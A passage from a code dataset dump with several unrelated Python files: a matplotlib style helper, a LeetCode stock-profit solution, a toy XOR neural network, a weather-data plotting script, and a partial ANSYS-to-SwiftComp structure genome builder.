'markeredgecolor', 'lw': 'linewidth', 'ecolor': 'markeredgecolor', 'hatch': 'hatch'}\n return {kw: self.__dict__[attr] for kw, attr in kw_attr.items() if self.__dict__[attr] != None}\n\n\nclass ClassMatchDefinition(object):\n '''\n '''\n\n def __init__(self, match_str='', match_type=MATCH_EXACT, is_auto=False):\n self.match_str = match_str\n self.match_type = match_type\n self.is_auto = is_auto\n\n def is_match_for_class(self, class_str):\n if self.match_type == MATCH_EXACT:\n return class_str == self.match_str\n\n elif self.match_type == MATCH_CONTAINS:\n return self.match_str in class_str\n\n elif self.match_type == MATCH_START:\n return class_str.startswith(self.match_str)\n\n elif self.match_type == MATCH_END:\n return class_str.endswith(self.match_str)\n\n elif self.match_type == MATCH_REGEXP:\n m = re.search(self.match_str, class_str)\n if m:\n return True\n else:\n return False\n\n","repo_name":"mfitzp/mplstyler","sub_path":"mplstyler/styles.py","file_name":"styles.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17044456704","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n \n left = 0 # buy\n right = 1 # sell\n profit = 0\n\n while right < len(prices):\n if prices[left] < prices[right]:\n currentProfit = prices[right] - prices[left] # = 4 - 1 = 3\n if currentProfit > profit:\n profit = currentProfit\n else:\n left = right\n right += 1\n return profit\n ","repo_name":"ZakariaBrahimi/Leetcode-challenges-Solutions","sub_path":"121-best-time-to-buy-and-sell-stock/121-best-time-to-buy-and-sell-stock.py","file_name":"121-best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3993214228","text":"import numpy as np\n\ndef sigmoid(x):\n return (1 / (1 + np.exp(-x)))\n\ndef dSigmoid(x):\n return x * (1 - x)\n\nclass Network:\n def __init__(self, x, y):\n self.x = x\n self.weights1 = np.random.rand(self.x.shape[1], 4)\n self.weights2 = np.random.rand(4, 1)\n self.y = y\n self.output = np.zeros(self.y.shape)\n\n def feedforward(self):\n self.layer1 = sigmoid(np.dot(self.x, self.weights1))\n self.output = sigmoid(np.dot(self.layer1, self.weights2))\n\n def backprop(self):\n weights2_change = np.dot(self.layer1.T, (2 * (self.y - self.output)) * dSigmoid(self.output))\n weights1_change = np.dot(self.x.T, (np.dot((2 * (self.y - self.output) * dSigmoid(self.output)), self.weights2.T) * dSigmoid(self.layer1)))\n\n self.weights2 += weights2_change\n self.weights1 += weights1_change\n\nX = np.array([[0, 0, 1], [0, 1, 1], [1, 0, 1], [1, 1, 1]])\nY = np.array([[0], [1], [1], [0]])\nnetwork = Network(X, Y)\n\nfor i in range(1000):\n network.feedforward()\n network.backprop()\n\nprint(network.output)\n","repo_name":"ssudler/number-ml","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21849157244","text":"from numpy import asarray\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\"\"\"\r\nLoad and Prepare dataset\r\n\"\"\"\r\n# Load dataset\r\ndata = pd.read_csv('data.csv')\r\n\r\n# Define y and x1, through to x9\r\ny = data['ALLSKY_SFC_PAR_TOT']\r\nx1 = data['T2M']\r\nx2 = data['PRECTOTCORR']\r\nx3 = data['WS2M']\r\nx4 = data['PS']\r\nx5 = data['RH2M']\r\nx6 = data['ALLSKY_SFC_UVA']\r\nx7 = data['ALLSKY_SFC_UVB']\r\nx8 = data['ALLSKY_SFC_UV_INDEX']\r\nx9 = data['CLRSKY_SFC_PAR_TOT']\r\n\r\n# Make plot\r\n\r\nfig, axs = plt.subplots(3, 3)\r\n\r\naxs[0, 0].plot(x1, y)\r\naxs[0, 0].set_title('T2M')\r\n\r\naxs[0, 1].plot(x2, y, 'green')\r\naxs[0, 1].set_title('PRECTOTCORR')\r\n\r\naxs[0, 2].plot(x3, y, 'red')\r\naxs[0, 2].set_title('WS2M')\r\n\r\naxs[1, 0].plot(x4, y, 'cyan')\r\naxs[1, 0].set_title('PS')\r\n\r\naxs[1, 1].plot(x5, y, 'magenta')\r\naxs[1, 1].set_title('RH2M')\r\n\r\naxs[1, 2].plot(x6, y, 'yellow')\r\naxs[1, 2].set_title('ALLSKY_SFC_UVA')\r\n\r\naxs[2, 0].plot(x7, y, 'black')\r\naxs[2, 0].set_title('ALLSKY_SFC_UVB')\r\n\r\naxs[2, 1].plot(x8, y)\r\naxs[2, 1].set_title('ALLSKY_SFC_UV_INDEX')\r\n\r\naxs[2, 2].plot(x9, y, 'green')\r\naxs[2, 2].set_title('CLRSKY_SFC_PAR_TOT')\r\n\r\n\r\nfor ax in axs.flat:\r\n ax.set(ylabel='ALLSKY_SFC_PAR_TOT')\r\n\r\n# Hide x labels and tick labels for top plots and\r\n# y ticks for right plots.\r\nfor ax in axs.flat:\r\n ax.label_outer()\r\n\r\n\r\nplt.show()\r\n\r\n\r\n# Some refs\r\n# https://matplotlib.org/stable/gallery/subplots_axes_and_figures/subplots_demo.html\r\n","repo_name":"Enowtakang/numerical-optimization-1","sub_path":"exploratory_data_analysis/linearity.py","file_name":"linearity.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17435695685","text":"import utilities\nimport ansys_materials\nimport sg_material\nimport sg_node\nimport sg_element\nimport sg_layer\n\nclass StructureGenome(object):\n '''Structure Genome class: contain all the information for a SG\n\n Attributes:\n BeamModel: Beam Model object\n PlateModel: Plate Model object\n SolidModel: Solid Model object\n analysis, elem_flag, trans_flag, temp_flag: common flag\n aperiodic: indicate wheather aperiodic or note\n py1, py2, py3: value for aperiodic\n nSG, nnode, nelem, nmate, nslave, nlayer: mesh control parameters\n '''\n\n def __init__(self):\n self.BeamModel = None\n self.PlateModel = None\n self.SolidModel = None\n\n self.analysis = 0\n self.elem_flag = 0\n self.trans_flag = 0\n self.temp_flag = 0\n\n self.aperiodic = False\n self.py1 = 0\n self.py2 = 0\n self.py3 = 0\n\n self.nSG = 0\n self.nnode = 0\n self.nelem = 0\n self.nmate = 0\n self.nslave = 0\n self.nlayer = 0\n \n self.Material = None\n self.Node = None\n self.Element = None\n self.Layer = None\n self.omega =0\n\n def setMacroModel(self, macroModel):\n if macroModel == \"Beam Model\":\n self.BeamModel = BeamModel()\n elif macroModel == \"Plate Model\":\n self.PlateModel = PlateModel()\n elif macroModel == \"Solid Model\":\n self.SolidModel = SolidModel()\n\n def setBeamModelControlParameters(self, submodel, beam_ini_curvatures, beam_ini_oblique, common_flag, aperiodic_flag): \n self.BeamModel.setBeamModel(submodel, beam_ini_curvatures, beam_ini_oblique)\n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setPlateModelControlParameters(self, submodel, plate_ini_curvatures, common_flag, aperiodic_flag):\n self.PlateModel.setPlateModel(submodel, plate_ini_curvatures)\n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setSolidModelControlParameters(self, common_flag, aperiodic_flag): \n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setCommonFlag(self, common_flag):\n '''Get: analysis, elem_flag, trans_flag, temp_flag'''\n\n analysis_dictionary = {'Elastic': 0, 'Thermoelastic': 1, 'Conduction': 2, \n 'Piezoelectric/Piezomagnetic': 3, 'Thermoepiezoelectric/Thermopiezomagnetic': 4,\n 'Piezoeletromagnetic': 5, 'Thermopiezoeletromagnetic': 6}\n\n elem_flag_dictionary = {'Regular Elements': 0, 'One Dimension Degenerated': 1, 'Two Dimension Degenerated': 2}\n\n trans_flag_dictionary = {'Global Coordinate System': 0, 'Element Coordinate System': 1}\n\n temp_flag_dictionary = {'Uniform': 0, 'Not-uniform': 1}\n\n self.analysis = analysis_dictionary[common_flag[0]]\n self.elem_flag = elem_flag_dictionary[common_flag[1]]\n self.trans_flag = trans_flag_dictionary[common_flag[2]]\n self.temp_flag = temp_flag_dictionary[common_flag[3]]\n\n def setAperiodicFlag(self, aperiodic_flag):\n '''Get: py1, py2, py3'''\n \n aperiodic_flag_dictionary = {'No': 0, 'Yes': 1}\n\n if len(aperiodic_flag) == 1:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n elif len(aperiodic_flag) == 2:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n self.py2 = aperiodic_flag_dictionary[aperiodic_flag[1]]\n elif len(aperiodic_flag) == 3:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n self.py2 = aperiodic_flag_dictionary[aperiodic_flag[1]]\n self.py3 = aperiodic_flag_dictionary[aperiodic_flag[2]]\n\n if self.py1 + self.py2 + self.py3 > 0:\n self.aperiodic = True\n\n\n def set1DSG(self, ExtAPI):\n self.nSG = 1\n self.Material1DSG = []\n self.Thickness1DSG = []\n self.Angle1DSG = []\n\n for x in ExtAPI.DataModel.Project.Model.Children:\n if x.Name == 'Imported Plies':\n ImportedPlies = x\n\n ACP = ImportedPlies.Children[0]\n ModelingGroup = ACP.Children[0]\n ModelingPlies = ModelingGroup.Children\n\n for ModelingPly in ModelingPlies:\n P1_ModelingPly = ModelingPly.Children[0]\n for layer in P1_ModelingPly.Children:\n self.Material1DSG.append(layer.Material)\n self.Thickness1DSG.append(float(str(layer.Thickness).split()[0]))\n self.Angle1DSG.append(float(str(layer.Angle).split()[0]))\n\n # the SwiftComp convention is from bottom to top\n self.Material1DSG = self.Material1DSG[::-1]\n self.Thickness1DSG = self.Thickness1DSG[::-1]\n self.Angle1DSG = self.Angle1DSG[::-1]\n \n self.nelem = len(self.Material1DSG)\n self.nnode = 4 * self.nelem + 1\n self.nmate = len(set(self.Material1DSG))\n self.nslave = 0\n self.nanlge = len(set(self.Angle1DSG))\n self.nlayer = self.nmate * self.nanlge\n self.omega = 1.0\n\n # node coordinate\n self.Node = []\n half_total_thickness = float(sum(self.Thickness1DSG)) / 2\n Node = sg_node.SGNode()\n Node.coordinate = [0.0, 0.0, -half_total_thickness]\n self.Node.append(Node)\n for i, thickness in enumerate(self.Thickness1DSG):\n for j in range(4):\n Node = sg_node.SGNode()\n z = sum([x for x in self.Thickness1DSG[:i]]) + float(j+1)/4 * thickness - half_total_thickness\n Node.coordinate = [0.0, 0.0, z]\n self.Node.append(Node)\n\n # layer block\n material_list = list(set(self.Material1DSG))\n angle_list = list(set(self.Angle1DSG))\n self.Layer = []\n for i in range(self.nmate):\n for j in range(self.nanlge):\n Layer = sg_layer.SGLayer()\n Layer.material_id = i + 1\n Layer.angle = angle_list[j]\n self.Layer.append(Layer)\n\n # element connectivity\n self.Element = []\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n Element.total_node = 5\n Element.total_corner_node = 2\n Element.connectivity = [1 + 4*i, 5 + 4*i, 2 + 4*i, 4 + 4*i, 3 + 4*i]\n for j, Layer in enumerate(self.Layer):\n if material_list[Layer.material_id-1] == self.Material1DSG[i] and Layer.angle == self.Angle1DSG[i]:\n Element.layer_id = j + 1\n break\n self.Element.append(Element)\n\n # material connectivity\n materials = ExtAPI.DataModel.Project.EngineeringDataLibrary.GetMaterials()\n materials_name_list = [mat.DisplayName for mat in materials]\n self.Material = []\n for i in range(self.nmate):\n material = materials[materials_name_list.index(material_list[i])]\n property_names = ansys_materials.GetListMaterialProperties(material)\n ntemp = 1; T = [0.0]; density = [0.0]\n\n density_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Density\")\n if density_dictionary:\n density_list = density_dictionary.get('Density')\n temperature_list = density_dictionary.get('Temperature') \n if temperature_list: # there is Temperature key\n ntemp = len(temperature_list) - 1\n T = temperature_list[1:ntemp+1]\n density = density_list[1:ntemp+1]\n\n elastic_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Elasticity\")\n if elastic_dictionary:\n # isotropic\n if \"Young's Modulus\" in elastic_dictionary:\n isotropy = 0\n E = elastic_dictionary[\"Young's Modulus\"][1:ntemp+1]\n nu = elastic_dictionary[\"Poisson's Ratio\"][1:ntemp+1]\n elif \"Young's Modulus X direction\" in elastic_dictionary: # orthotropic\n isotropy = 1\n E1 = elastic_dictionary[\"Young's Modulus X direction\"][1:ntemp+1]\n E2 = elastic_dictionary[\"Young's Modulus Y direction\"][1:ntemp+1]\n E3 = elastic_dictionary[\"Young's Modulus Z direction\"][1:ntemp+1]\n G12 = elastic_dictionary[\"Shear Modulus XY\"][1:ntemp+1]\n G13 = elastic_dictionary[\"Shear Modulus XZ\"][1:ntemp+1]\n G23 = elastic_dictionary[\"Shear Modulus YZ\"][1:ntemp+1]\n nu12 = elastic_dictionary[\"Poisson's Ratio XY\"][1:ntemp+1]\n nu13 = elastic_dictionary[\"Poisson's Ratio XZ\"][1:ntemp+1]\n nu23 = elastic_dictionary[\"Poisson's Ratio YZ\"][1:ntemp+1]\n elif 'D[*,1]' in elastic_dictionary: # anisotropic\n isotropy = 2\n column1 = elastic_dictionary[\"D[*,1]\"][1:]\n column2 = elastic_dictionary[\"D[*,2]\"][1:]; column2[0] = column1[1]\n column3 = elastic_dictionary[\"D[*,3]\"][1:]; column3[0] = column1[2]; column3[1] = column2[2]\n column4 = elastic_dictionary[\"D[*,4]\"][1:]; column4[0] = column1[3]; column4[1] = column2[3]; column4[2] = column3[3]\n column5 = elastic_dictionary[\"D[*,5]\"][1:]; column5[0] = column1[4]; column5[1] = column2[4]; column5[2] = column3[4]; column5[3] = column4[4]\n column6 = elastic_dictionary[\"D[*,6]\"][1:]; column6[0] = column1[5]; column6[1] = column2[5]; column6[2] = column3[5]; column6[3] = column4[5]; column6[4] = column5[5]\n D = []\n for k in range(6):\n row = [[column1[k], column2[k], column3[k], column4[k], column5[k], column6[k]]]\n D += row\n C = D\n C[3], C[4] = C[4], C[3]\n C[4], C[5] = C[5], C[4]\n C = utilities.transpose(C)\n C[4], C[5] = C[5], C[4]\n C[3], C[4] = C[4], C[3]\n C = utilities.transpose(C)\n\n Material = sg_material.SGMaterial(isotropy, ntemp, 1)\n Material.name = material_list[i]\n if isotropy == 0:\n Material.setIsotropicMaterialProperty(ntemp, T, density, E, nu)\n elif isotropy == 1:\n Material.setOrthotropicMaterialProperty(ntemp, T, density, E1, E2, E3, G12, G13, G23, nu12, nu13, nu23)\n elif isotropy == 2:\n Material.setAnisotropicMaterialProperty(ntemp, T, density, C)\n\n self.Material.append(Material)\n \n\n def setMaterial(self, ExtAPI):\n ''' set Material attribute'''\n\n self.Material = []\n \n # total number of parts\n part_total = ExtAPI.DataModel.GeoData.Assemblies[0].Parts.Count\n\n for part in range(part_total):\n\n # total number of bodies for current part\n body_total = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies.Count\n\n for body in range(body_total):\n\n # body id for this body\n body_id = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies[body].Id\n\n # material object for this body (Ansys.EngineeringData.Material.MaterialClass)\n material = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies[body].Material\n\n # list of material property names for this body\n # possible names are:\n # Isotropic (Structural Steel):\n # ['Appearance', 'Compressive Ultimate Strength', 'Compressive Yield Strength', 'Density', 'Tensile Yield Strength', \n # 'Tensile Ultimate Strength', 'Coefficient of Thermal Expansion', 'Specific Heat', 'Thermal Conductivity', 'S-N Curve', \n # 'Strain-Life Parameters', 'Resistivity', 'Elasticity', 'Relative Permeability', 'Field Variable']\n # Orthotropic (\n # ['Density', 'Ply Type', 'Elasticity', 'Strain Limits', 'Stress Limits', 'Coefficient of Thermal Expansion',\n # 'Puck Constants', 'Additional Puck Constants', 'Tsai-Wu Constants', 'Appearance']\n property_names = ansys_materials.GetListMaterialProperties(material)\n\n ntemp = 1; T = [0.0]; density = [0.0]\n\n if 'Density' in property_names:\n\n # Obtain density dictionary\n # Examples: \n # {'Density': ['kg m^-3', 1160]}\n # {'Density': ['kg m^-3', 7850, 23], 'Temperature': ['C', 1, 2]} \n density_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Density\")\n\n density_list = density_dictionary.get('Density')\n\n temperature_list = density_dictionary.get('Temperature') \n\n if temperature_list: # there is Temperature key\n ntemp = len(temperature_list) - 1\n T = temperature_list[1:ntemp+1]\n density = density_list[1:ntemp+1]\n \n if \"Elasticity\" in property_names:\n\n # Obtain Elasticity dictionary\n # Examples: \n # isotropic: {'Poisson's Ratio': ['', 0.35], 'Bulk Modulus': ['Pa', 4200000000], 'Young's Modulus': ['Pa', 3780000000], 'Shear Modulus': ['Pa', 1400000000]}\n # isotropic: {'Shear Modulus': ['Pa', 10.4545454545455, 76923076923.0769], 'Bulk Modulus': ['Pa', 9.58333333333333, 166666666666.667], \n # 'Poisson's Ratio': ['', 0.1, 0.3], 'Temperature': ['C', 1, 2], 'Young's Modulus': ['Pa', 23, 200000000000]}\n # orthotropic: {'Poisson's Ratio YZ': ['', 0.3], 'Young's Modulus Z direction': ['Pa', 9000000000], 'Poisson's Ratio XZ': ['', 0.3], 'Young's Modulus Y direction':\n # ['Pa', 91820000000], 'Young's Modulus X direction': ['Pa', 91820000000], 'Shear Modulus XY': ['Pa', 19500000000], 'Shear Modulus YZ': ['Pa', 3000000000], \n # 'Shear Modulus XZ': ['Pa', 3000000000], 'Poisson's Ratio XY': ['', 0.05]}\n # anisotropic: {'D[*,3]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 166000000000, 0, 0, 0], \n # 'D[*,2]': ['Pa', 7.88860905221012E-31, 166000000000, 64000000000, 0, 0, 0], \n # 'D[*,1]': ['Pa', 166000000000, 64000000000, 64000000000, 0, 0, 0], \n # 'D[*,6]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000], \n # 'D[*,5]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000, 0], \n # 'D[*,4]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000, 0, 0]}\n elastic_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Elasticity\")\n\n # isotropic\n if \"Young's Modulus\" in elastic_dictionary:\n isotropy = 0\n E = elastic_dictionary[\"Young's Modulus\"][1:ntemp+1]\n nu = elastic_dictionary[\"Poisson's Ratio\"][1:ntemp+1]\n elif \"Young's Modulus X direction\" in elastic_dictionary: # orthotropic\n isotropy = 1\n E1 = elastic_dictionary[\"Young's Modulus X direction\"][1:ntemp+1]\n E2 = elastic_dictionary[\"Young's Modulus Y direction\"][1:ntemp+1]\n E3 = elastic_dictionary[\"Young's Modulus Z direction\"][1:ntemp+1]\n G12 = elastic_dictionary[\"Shear Modulus XY\"][1:ntemp+1]\n G13 = elastic_dictionary[\"Shear Modulus XZ\"][1:ntemp+1]\n G23 = elastic_dictionary[\"Shear Modulus YZ\"][1:ntemp+1]\n nu12 = elastic_dictionary[\"Poisson's Ratio XY\"][1:ntemp+1]\n nu13 = elastic_dictionary[\"Poisson's Ratio XZ\"][1:ntemp+1]\n nu23 = elastic_dictionary[\"Poisson's Ratio YZ\"][1:ntemp+1]\n elif 'D[*,1]' in elastic_dictionary: # anisotropic\n isotropy = 2\n # In ANSYS, it has\n # 'D[*,1]' = [D11, D21, D31, D41, D51, D61]\n # 'D[*,2]' = [D22, D32, D42, D52, D62]\n # 'D[*,3]' = [D33, D43, D53, D63]\n # 'D[*,4]' = [D44, D54, D64]\n # 'D[*,5]' = [D55, D65]\n # 'D[*,6]' = [D66\n # so the columns are:\n # column1 = [D11, D21, D31, D41, D51, D61]\n # column2 = [D12, D22, D32, D42, D52, D62]\n # column3 = [D13, D23, D33, D43, D53, D63]\n # column4 = [D41, D42, D43, D44, D54, D64]\n # column5 = [D51, D52, D53, D54, D55, D65]\n # column6 = [D61, D62, D63, D64, D65, D66]\n column1 = elastic_dictionary[\"D[*,1]\"][1:]\n column2 = elastic_dictionary[\"D[*,2]\"][1:]; column2[0] = column1[1]\n column3 = elastic_dictionary[\"D[*,3]\"][1:]; column3[0] = column1[2]; column3[1] = column2[2]\n column4 = elastic_dictionary[\"D[*,4]\"][1:]; column4[0] = column1[3]; column4[1] = column2[3]; column4[2] = column3[3]\n column5 = elastic_dictionary[\"D[*,5]\"][1:]; column5[0] = column1[4]; column5[1] = column2[4]; column5[2] = column3[4]; column5[3] = column4[4]\n column6 = elastic_dictionary[\"D[*,6]\"][1:]; column6[0] = column1[5]; column6[1] = column2[5]; column6[2] = column3[5]; column6[3] = column4[5]; column6[4] = column5[5]\n\n # now matrix [D] become:\n # D11 D21 D31 D41 D51 D61\n # D21 D22 D32 D42 D52 D62\n # D31 D32 D33 D43 D53 D63\n # D41 D42 D43 D44 D54 D64\n # D51 D52 D53 D54 D55 D65\n # D61 D62 D63 D64 D65 D66\n D = []\n for k in range(6):\n row = [[column1[k], column2[k], column3[k], column4[k], column5[k], column6[k]]]\n D += row\n\n # The engineering notation in ANSYS is 11, 22, 33, 12, 23, 13\n # We need to change it to be 11, 22, 33, 23, 13, 12 for SwiftComp\n C = D\n\n C[3], C[4] = C[4], C[3]\n C[4], C[5] = C[5], C[4]\n C = utilities.transpose(C)\n C[4], C[5] = C[5], C[4]\n C[3], C[4] = C[4], C[3]\n C = utilities.transpose(C)\n\n\n tensile_ultimate_strength_dictionary = {}\n if 'Tensile Ultimate Strength' in property_names:\n # Obtain Tensile Ultimate Strength\n # Examples: \n # {'Tensile Ultimate Strength': ['Pa', 460000000]}\n tensile_ultimate_strength_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Tensile Ultimate Strength')\n\n Compressive_ultimate_strength_dictionary = {}\n if 'Compressive Ultimate Strength' in property_names:\n # Obtain Compressive Ultimate Strength\n # Examples: \n # {'Compressive Ultimate Strength': ['Pa', 0]}\n Compressive_ultimate_strength_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Compressive Ultimate Strength')\n\n stress_limits_dictionary = {}\n if 'Stress Limits' in property_names:\n # Obtain Stress Limits\n # Examples: \n # {'Tensile Z direction': ['Pa', 29000000], 'Compressive X direction': ['Pa', -1082000000], 'Shear YZ': ['Pa', 32000000], \n # 'Tensile X direction': ['Pa', 2231000000], 'Shear XZ': ['Pa', 60000000], 'Compressive Y direction': ['Pa', -100000000], \n # 'Shear XY': ['Pa', 60000000], 'Tensile Y direction': ['Pa', 29000000], 'Compressive Z direction': ['Pa', -100000000]}\n stress_limits_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Stress Limits')\n\n strain_limits_dictionary = {}\n if 'Strain Limits' in property_names:\n # Obtain Strain Limits\n # Examples: \n # {'Tensile Z direction': ['', 0.0032], 'Compressive X direction': ['', -0.0108], 'Shear YZ': ['', 0.011], \n # 'Tensile X direction': ['', 0.0167], 'Shear XZ': ['', 0.012], 'Compressive Y direction': ['', -0.0192], \n # 'Shear XY': ['', 0.012], 'Tensile Y direction': ['', 0.0032], 'Compressive Z direction': ['', -0.0192]}\n strain_limits_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Strain Limits')\n\n # create SGMaterial instance\n Material = sg_material.SGMaterial(isotropy, ntemp, body_id)\n Material.name = material.DisplayName\n if isotropy == 0:\n Material.setIsotropicMaterialProperty(ntemp, T, density, E, nu)\n elif isotropy == 1:\n Material.setOrthotropicMaterialProperty(ntemp, T, density, E1, E2, E3, G12, G13, G23, nu12, nu13, nu23)\n elif isotropy == 2:\n Material.setAnisotropicMaterialProperty(ntemp, T, density, C)\n\n # set Tensile Ultimate Strength if any\n if tensile_ultimate_strength_dictionary:\n tensileUltimateStrength = tensile_ultimate_strength_dictionary['Tensile Ultimate Strength'][1]\n Material.setTensileUltimateStrength(ntemp, tensileUltimateStrength)\n\n # set Compressive Ultimate Strength if any\n if Compressive_ultimate_strength_dictionary:\n compressiveUltimateStrength = Compressive_ultimate_strength_dictionary['Compressive Ultimate Strength'][1]\n Material.setCompressiveUltimateStrength(ntemp, compressiveUltimateStrength)\n\n # set Stress Limitsh if any\n if stress_limits_dictionary:\n X_t = stress_limits_dictionary['Tensile X direction'][1]\n Y_t = stress_limits_dictionary['Tensile Y direction'][1]\n Z_t = stress_limits_dictionary['Tensile Z direction'][1]\n X_c = stress_limits_dictionary['Compressive X direction'][1]\n Y_c = stress_limits_dictionary['Compressive Y direction'][1]\n Z_c = stress_limits_dictionary['Compressive Z direction'][1]\n R = stress_limits_dictionary['Shear YZ'][1]\n T = stress_limits_dictionary['Shear XZ'][1]\n S = stress_limits_dictionary['Shear XY'][1] \n Material.setOrthotropicStressLimits(ntemp, X_t, Y_t, Z_t, X_c, Y_c, Z_c, R, T, S)\n\n # set Strain Limits if any\n if strain_limits_dictionary:\n Xe_t = strain_limits_dictionary['Tensile X direction'][1]\n Ye_t = strain_limits_dictionary['Tensile Y direction'][1]\n Ze_t = strain_limits_dictionary['Tensile Z direction'][1]\n Xe_c = strain_limits_dictionary['Compressive X direction'][1]\n Ye_c = strain_limits_dictionary['Compressive Y direction'][1]\n Ze_c = strain_limits_dictionary['Compressive Z direction'][1]\n Re = strain_limits_dictionary['Shear YZ'][1]\n Te = strain_limits_dictionary['Shear XZ'][1]\n Se = strain_limits_dictionary['Shear XY'][1] \n Material.setOrthotropicStrainLimits(ntemp, Xe_t, Ye_t, Ze_t, Xe_c, Ye_c, Ze_c, Re, Te, Se)\n\n # check whether this material is a new material or not\n mark = 0\n for MaterialTemp in self.Material:\n if Material == MaterialTemp:\n mark = 1 # mark = 1 means this material is not new\n break\n if mark == 0: # mark = 0 means this material is new. add it to Material list property\n self.Material.append(Material)\n\n def setMeshControlParameters(self, ExtAPI):\n '''set nSG, nnode, nelem, nmate, nslave, nlayer'''\n # Check one element to determine nSG. (One element is enough)\n # 1D element -> nSG = 1\n # 2D element -> nSG = 2\n # 3D element -> nSG = 3\n self.nSG = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.ElementById(1).Dimension\n self.nnode = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.Nodes.Count\n self.nelem = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.Elements.Count\n self.nmate = len(self.Material)\n self.nslave = 0\n self.nlayer = 0\n\n def setNodaCoordinate(self, ExtAPI):\n '''set nodal coordinates'''\n self.Node = []\n for i in range(self.nnode):\n Node = sg_node.SGNode()\n x = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).X\n y = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).Y\n z = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).Z\n Node.coordinate = [x, y, z]\n self.Node.append(Node)\n\n def setElementConnectivity(self, ExtAPI):\n '''\n ================================================================\n Element connectivity in SwiftComp\n ---------------------------------\n Linear triangular element: kTri3\n connectivity = [1, 2, 3, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic triangular element: kTri6\n connectivity = [1, 2, 3, 0, 4, 5, 6, 0, 0]\n ---------------------------------\n Linear quadrilateral element: kQuad4\n connectivity = [1, 2, 3, 4, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic quadrilateral element: kQuad8\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 0]\n ---------------------------------\n Linear tetrahedral element: kTet4\n connectivity = [1, 2, 3, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic tetrahedral element: kTet10\n connectivity = [1, 2, 3, 4, 0, 5, 6, 7, 8, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Linear brick element: kHex8\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic brick element: kHex20\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n ================================================================\n '''\n self.Element = []\n if self.nSG == 2:\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n connectivity = list(ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeIdsFromElementIds([i+1]))\n if len(connectivity) == 3: # Linear triangular element: kTri3\n Element.elementType = 'kTri3'\n Element.total_node = 3\n Element.total_corner_node = 3\n Element.connectivity = connectivity + [0] * 6\n elif len(connectivity) == 6: # Quadratic triangular element: kTri6\n Element.elementType = 'kTri6'\n Element.total_node = 6\n Element.total_corner_node = 3\n Element.connectivity = connectivity[0:3] + [0] + connectivity[3:6] + [0] * 2\n elif len(connectivity) == 4: # Linear quadrilateral element: kQuad4\n Element.elementType = 'kQuad4'\n Element.total_node = 4\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0] * 5\n elif len(connectivity) == 8: # Quadratic quadrilateral element: kQuad8\n Element.elementType = 'kQuad8'\n Element.total_node = 8\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0]\n else:\n utilities.element2DTypeWrongMessage()\n raise EOFError\n self.Element = self.Element + [Element]\n elif self.nSG == 3:\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n connectivity = list(ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeIdsFromElementIds([i+1]))\n if len(connectivity) == 4: # Linear tetrahedral element: kTet4\n Element.elementType = 'kTet4'\n Element.total_node = 4\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0] * 16\n elif len(connectivity) == 10: # Quadratic tetrahedral element: kTet10\n 